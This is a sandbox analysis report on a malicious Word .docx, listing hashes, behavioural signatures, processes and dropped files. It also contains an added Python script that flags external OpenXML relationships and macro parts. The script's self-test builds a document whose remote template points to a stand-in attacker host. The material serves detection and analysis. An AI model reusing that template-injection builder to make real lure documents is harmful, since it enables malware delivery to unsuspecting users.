Analysis

  • max time kernel
    102s
  • max time network
    56s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    18/05/2023, 02:00

General

  • Target

    0D9A51628CB6EF7CFA6074D8C6E89F61E2321BFBB39B7CE9A2E2D1972E0E163E.docx

  • Size

    11KB

  • MD5

    c94062b9a586d15cd884246aefb0a75b

  • SHA1

    22a13b5db65f00a9e91e8c37e496df25b5276e77

  • SHA256

    0d9a51628cb6ef7cfa6074d8c6e89f61e2321bfbb39b7ce9a2e2d1972e0e163e

  • SHA512

    18c9d7f96317d483093b5966cadb82e45a2310eea351b54f928554bef8c439cfd454a5a9ba0e1fe3ea1322d798e4d3c5cb9ed7496c545af3e5d822ecdba36fdb

  • SSDEEP

    192:CtNCWUyn0i13pNXqkOcPiYFLwzvdX6Ptpwjnw+umHBCusiWVd:aNxUyn0i13LROEiOLkX6Ujnw+3VyVd

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location (2 IoCs)
  • Drops file in Windows directory (1 IoC)
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings (1 TTP, 31 IoCs)
  • Modifies registry class (64 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)
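The first and third signatures above describe a static property of the document itself: a .docx is a ZIP package, and any remote template, OLE link or other external part Word will fetch on open must be declared in one of its `*.rels` files with `TargetMode="External"`, while macros and embedded objects ship as extra package parts. The script below, an added example that is not part of the Triage report, performs that check offline. The sample document it builds is constructed in memory with a hypothetical URL (`template.attacker.invalid`); the report page does not show the real sample's external target, so nothing here should be read as that value.

```python
"""Static triage for a .docx: list externally targeted OpenXML relationships and
parts that indicate VBA or embedded objects.

Added example, not from the Triage report. The test document is constructed here
with a hypothetical remote template URL so the script runs offline.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")

# Package parts whose presence suggests VBA, OLE embeddings or ActiveX (heuristic prefixes).
MACRO_OR_EMBED_PREFIXES = ("word/vbaProject.bin", "word/embeddings/", "word/activeX/")

# Relationship types that make Word load content from the target on open. Plain
# hyperlinks are also External but only resolve when clicked, so they are not listed.
REMOTE_LOAD_TYPES = ("attachedTemplate", "oleObject", "frame", "subDocument")


def external_relationships(docx_bytes):
    """Return (rels_part, short_type, target) for every relationship with TargetMode="External".

    Relationship parts can live anywhere in the package, e.g. word/_rels/document.xml.rels
    or word/_rels/settings.xml.rels (where an attachedTemplate is declared), so every
    *.rels member is inspected rather than a fixed list.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                hits.append((name, "unparseable", None))  # malformed .rels is itself notable
                continue
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, short_type, rel.get("Target")))
    return hits


def macro_or_embedded_parts(docx_bytes):
    """Return package members that look like VBA projects, OLE embeddings or ActiveX controls."""
    prefixes = tuple(p.lower() for p in MACRO_OR_EMBED_PREFIXES)
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return sorted(n for n in z.namelist() if n.lower().startswith(prefixes))


def triage(docx_bytes):
    """Combine both checks into one verdict dict; 'flag' is True when Word would fetch
    a remote part on open or the package carries macro/embedded content."""
    ext = external_relationships(docx_bytes)
    remote_load = [h for h in ext if h[1] in REMOTE_LOAD_TYPES]
    parts = macro_or_embedded_parts(docx_bytes)
    return {"external": ext, "remote_load": remote_load,
            "macro_or_embed": parts, "flag": bool(remote_load or parts)}


def build_sample_docx(template_url):
    """Construct a minimal .docx whose settings.xml references a remote attachedTemplate.

    Constructed test input (hypothetical URL), not the sample from the report; only the
    parts needed to exercise the check are written.
    """
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>'
        '</Relationships>' % (REL_NS, ATTACHED_TEMPLATE, template_url)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml",
                   '<w:settings><w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://template.attacker.invalid/t.dotm")  # hypothetical
    verdict = triage(sample)
    for part, rtype, target in verdict["external"]:
        print("%s: %s -> %s" % (part, rtype, target))
    print("flag:", verdict["flag"])
```

To run it against a real submission, replace `sample` with the bytes of the file (`open(path, "rb").read()`); an `attachedTemplate` or `oleObject` relationship with an `http`, `https` or UNC target is the static counterpart of the dynamic "download file from external location" signature, and the target host is the IoC to pivot on.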

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 744)
    Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0D9A51628CB6EF7CFA6074D8C6E89F61E2321BFBB39B7CE9A2E2D1972E0E163E.docx"
    Signatures triggered by this process:
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • C:\Windows\splwow64.exe (PID 1792, child of PID 744)
      Command line: C:\Windows\splwow64.exe 12288

    Network

          MITRE ATT&CK Enterprise v6

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{F10D4753-56BE-45E2-B640-6529254E6CD3}.FSD

            Filesize

            128KB

            MD5

            e26447a5cb5d5956a65ca5993a8bc780

            SHA1

            aebe8480ee37d9a5fdcf5a143f59d4203c93ed8a

            SHA256

            87c499fbc294056b5b3da3cb8c71a4fbbcb7874decd340401bc89df9dc688071

            SHA512

            8bdb0623446641c92893bbb7fb7be94a52acc0899413410f3ff75f56325c5714de89223e43dc7b0ff5464b71ee2aab2db9a7ea1f14afe9be9f5c69bc87bd931e

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

            Filesize

            128KB

            MD5

            9924c4bb5c977d1bfb23c215a7c8d744

            SHA1

            b04b57c855462d1777c7cf6f133258e0b17839d0

            SHA256

            e94bae6f7e455c014ec044a10b797b96834a3230a7cef781f61a18df4d0444fc

            SHA512

            ea38cbcbeaa09c1bf286964bbfbfdd1abb10a23103b204e998d106e543c60f7d3c425524275ff50ccb11b7affba71d330850b013d197561e62e7bf6bd949f298

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{F09E0D3F-A5D6-4B0A-940D-45479C9EED99}.FSD

            Filesize

            128KB

            MD5

            3936ca1f7561e95465e3fcc2ac6384ad

            SHA1

            fcb440c09884911151dace772b575277409c9d21

            SHA256

            6b3943833c36175ff850b712d94aafb2b249609e1e2cc1cb527ab99146b924d8

            SHA512

            d5b401e2bb135c691117acee4eaec29a2a82668de3351be2620eaaf483985a1bcb7129940094fb875168cbe7335e590621358e41d10604f5d72c958857db1116

          • C:\Users\Admin\AppData\Local\Temp\{DCC2F599-85C8-48A2-9C15-00CBBC63CE62}

            Filesize

            128KB

            MD5

            09dd5c3062a8ff7566abde23d3399745

            SHA1

            34e5631992f915e6ac28839042afdc3bd27bf218

            SHA256

            1b5c106bfdaed1a23489601907cac58d9708458dee8ce5da898b899f0cac6d5c

            SHA512

            6e697f7c8b8b3dc9f341661613f31cfbc395bcb8b71cd18e3b8251aeb3fe2f18cec000809c06f8f7983f4ce73616fac0d94805bf6a5fb074500ef15b229cbbdc

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            ea3ceef89f5ffe9bba0c5138828633e8

            SHA1

            63d31dc3f1c4aa804f209490f1594ebf34c36cac

            SHA256

            43acdb918d364629dcb9acd6aa6ba36dca408000b673110c5ae838efe437368c

            SHA512

            3e295d0e1ee97da5aa2e13e51917e00c56d2424efd8d8acaf23ed2e4777e9b59c61f8c923b3b7b4b59af0ebb5b0ca81498a77ad8f78c61115fca4836e1b5e537

          • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

            Filesize

            2B

            MD5

            f3b25701fe362ec84616a93a45ce9998

            SHA1

            d62636d8caec13f04e28442a0a6fa1afeb024bbb

            SHA256

            b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

            SHA512

            98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

          • memory/744-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/744-148-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB